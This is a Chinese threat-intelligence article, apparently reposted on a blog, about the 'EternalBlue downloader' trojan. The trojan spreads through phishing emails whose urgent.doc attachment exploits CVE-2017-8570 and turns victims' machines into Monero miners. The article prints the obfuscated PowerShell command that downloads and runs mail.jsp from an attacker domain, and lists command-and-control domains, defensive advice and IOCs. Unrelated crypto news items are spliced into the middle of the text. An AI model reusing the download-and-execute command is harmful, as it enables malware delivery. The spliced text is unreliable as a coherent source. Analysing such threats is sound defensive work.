“永恒之蓝下载器木马”新增钓鱼邮件传播,利用用户机器挖矿门罗币_MERC:GNASHER

来源:腾讯御见威胁情报中心

编者注:原标题为《“永恒之蓝下载器木马”新增钓鱼邮件传播,附件含CVE-2017-8570漏洞攻击代码》

“永恒之蓝”下载器木马在感染用户机器上运行后,会自动当前用户的邮箱通讯录并发送附件为urgent.doc的文档,该文档附带CVE-2017-8570漏洞攻击代码。

如果被攻击用户收到邮件并不慎打开文档,就可能触发漏洞执行Powershell命令下载mail.jsp:

梅赛德斯-奔驰推出3个核心NFT系列:金色财经报道,汽车制造商梅赛德斯-奔驰在官方社交媒体上称,推出Mercedes-Benz NXT,Mercedes-Benz NXT将是梅赛德斯奔驰的web3家园,提供基于区块链的数字艺术和数字收藏品。

Mercedes-Benz NXT官方表示,经过数月准备,将推出3个核心NFT系列,该系列数字收藏品由梅赛德斯-奔驰设计团队围绕首席设计官Gorden Wagener创建,将过去、现在和未来联系起来。

此外,Mercedes-Benz NXT称,任何看起来像来自我们的推文都有可能是冒充者,不要点击他们的链接。[2023/5/30 11:47:47]

C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

GreenRock Energy发行2500万欧元代币化绿色债券:金色财经报道,奥地利能源公司GreenRock Energy正在发行代币化绿色债券,以筹集2500万欧元(2700万美元),资金将投资于太阳能电池板业务和安装。其在Polygon区块链上发行代币得到了三个监管机构的 \"批准\",即德国的BaFin、奥地利的FMA和意大利的CONSOB。

此次发行在巴伐利亚州金融管理局的网站上列出。巴伐利亚州金融管理局对招股说明书的批准只是意味着它包括所有需要的信息。[2023/5/25 10:40:07]

而下载使用的域名ap35nf7.jp实际上并没有注册,但是依然能够解析到地址:t.awcna.com,是因为被感染机器的本地hosts文件被篡改,使得随机生成的域名映射到木马使用的恶意地址,细节请参考御见威胁情报中心此前发布的报告:《“永恒之蓝下载器”木马篡改hosts指向随机域名,再用多个漏洞攻击内网挖矿》。

KuCoin Labs与区块链企业VAIOT联合成立了数字资产监管研究所:金色财经报道,KuCoin Labs 与区块链和人工智能服务企业VAIOT联合成立了数字资产监管研究所 (DARI),以促进以行业为主导的加密货币监管。VAIOT 是欧洲首批受到全面监管的加密货币公司之一,自 2020 年 9 月起受到马耳他严格法律审查的监管,并由领先的会计和咨询公司 Grant Thornton 进行监督。[2023/4/9 13:52:19]

本次攻击过程中,木马将使用随机生成的字符加“.cn”或”.jp“或”.kr“后缀作为DGA域名,并在hosts文件中指向域名:

t.tr2q.com,t.awcna.com,t.amynx.com

mail.jsp经过高度混淆,多次解密后可以看到其安装多个计划任务下载Powershell脚本执行,并使用了新的计划任务名:

“Bluetea“蓝茶。

“永恒之蓝”下载器木马自出现之后从未停止更新,从最初的PE样本攻击到后来转移为以Powershell无文件攻击方式躲避查杀,并且通过安装多个类型的计划任务进行持久化。在传播方式上,最初通过供应链攻击积累一批感染机器后,又不断利用”永恒之蓝”漏洞,MSSql爆破,$IPC爆破,RDP爆破等方法进行扩散传播,近期又增加了DGA域名攻击和钓鱼邮件攻击,其最终目的只为利用用户机器挖矿门罗币获利。

永恒之蓝下载器木马的历次版本更新参考下表:

安全建议

1.建议用户不要轻易打开不明来源的邮件附件,对于邮件附件中的文件要格外谨慎运行,如发现有脚本或其他可执行文件可先使用杀软件进行扫描;

2.服务器使用安全的密码策略,特别是IPC$、MSSQL、RDP账号密码,切勿使用弱口令,避免遭遇弱密码爆破攻击;

3.根据微软安全公告及时修复Office漏洞CVE-2017-8570,需进行漏洞扫描和修复,或采用WindowsUpdate进行。

IOCs

http//t.awcna.com/mail.jsp

郑重声明: 本文版权归原作者所有, 转载文章仅为传播更多信息之目的, 如作者信息标记有误, 请第一时间联系我们修改或删除, 多谢。

金智博客

[0:0ms0-6:846ms